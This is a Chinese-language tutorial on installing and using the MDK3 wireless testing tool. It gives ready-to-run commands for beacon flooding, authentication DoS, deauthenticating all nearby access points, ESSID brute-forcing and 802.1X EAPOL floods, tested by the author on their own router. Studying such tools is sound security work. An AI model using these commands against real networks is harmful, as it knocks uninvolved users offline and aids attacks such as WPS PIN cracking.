MDK3 简介
MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能。
安装过程
1 2 3
| wget http: tar xvzf mdk3-v6.tar.gz cd mdk3-v6
|
如果遇到这种错误
1 2 3 4 5
| --2015-08-14 20:50:36-- http: 正在解析主机 linux.gungoos.com (linux.gungoos.com)... 185.27.134.115 正在连接 linux.gungoos.com (linux.gungoos.com)|185.27.134.115|:80... 已连接。 已发出 HTTP 请求,正在等待回应... 403 Forbidden 2015-08-14 20:50:37 错误 403:Forbidden。
|
试试直接用Firefox访问那个地址下载吧。
将 “-lpthread” 替换成 “-pthread”。之后按ctrl + x -> Y (enter) -> enter
这里make之后会刷出很多warnings,但并不影响编译。
测试环境
系统: Ubuntu 14.04
网卡: TP-LINK TL-WN722N
路由器: FAST FW150R
MDK3 使用方法
查看帮助
Beacon Flood Mode
详细介绍
这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| mdk3 mon0 b -n <ssid> -f <filename> -v <filename> -d -w -g -t -a -m -c <chan> -s <pps> mdk3 --help b
|
示例一
1
| sudo mdk3 mon0 b -f wordlist1.txt -a -c 6 -s 80
|
./wordlist1.txt
示例二
固定FakeAP的MAC
1
| sudo mdk3 mon0 b -v wordlist2.txt -a -c 6 -s 80
|
./wordlist2.txt
1 2
| AA:BB:CC:DD:AA:EE burpSuite 11:22:33:DD:AA:EE WPSHAK
|
效果说明
PC可以容易看到 FakeAP,但是 Android 的 WLAN 扫描不容易看到,原因暂不明。
Authentication DoS Mode
详细说明
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在 reaver 穷据路由 PIN 码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由。
1 2 3 4 5 6
| mdk3 mon0 a -a <ap_mac> -m -c -i <ap_mac> -s <pps>
|
示例一
1
| sudo mdk3 mon0 a -a EC:88:8F:A1:A5:90 -s 200
|
似乎无效
手机连接AP正常上网
Deauthentication/Disassociation Amok Mode
详细说明
这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击……可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击。
1 2 3 4 5
| mdk3 mon0 d -w <filename> -b <filename> -s <pps> -c [chan,chan,chan,...]
|
示例一
1
| sudo mdk3 d -s 120 -c 1,6,11
|
Basic probing and ESSID Bruteforce Mode
详细介绍
基本探测AP信息和ESSID猜解模式
1 2 3 4 5 6
| mdk3 mon0 p -e <ssid> -f <filename> -t <bssid> -s <pps> -b <character set>
|
802.1X tests Mode
详细介绍
802.1X 协议下的攻击测试
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| mdk3 mon0 x 0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击 -n <ssid> -t <bssid> #目标客户端的mac地址 -w <WPA type> Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA) -u <unicast cipher> Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP) -m <multicast cipher> Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP) -s <pps> #速率,默认400 1 - EAPOL Logoff test #注销认证攻击 -t <bssid> #目标客户端的mac地址 -c <bssid> #目标ap的合法客户端mac -s <pps> #速率,默认400
|
参考资料
[1] Install mdk3 on Ubuntu 14.04
[2] 印尼语神奇资料请在google translate帮助下服用
[3] 无线攻击神器–MDK3 使用方法
[4] 无线Hacking之D.O.S与AP欺骗
[5] MDK3-无线拒绝服务攻击的开始
[6] Kali mdk3项目页面
[7] 项目页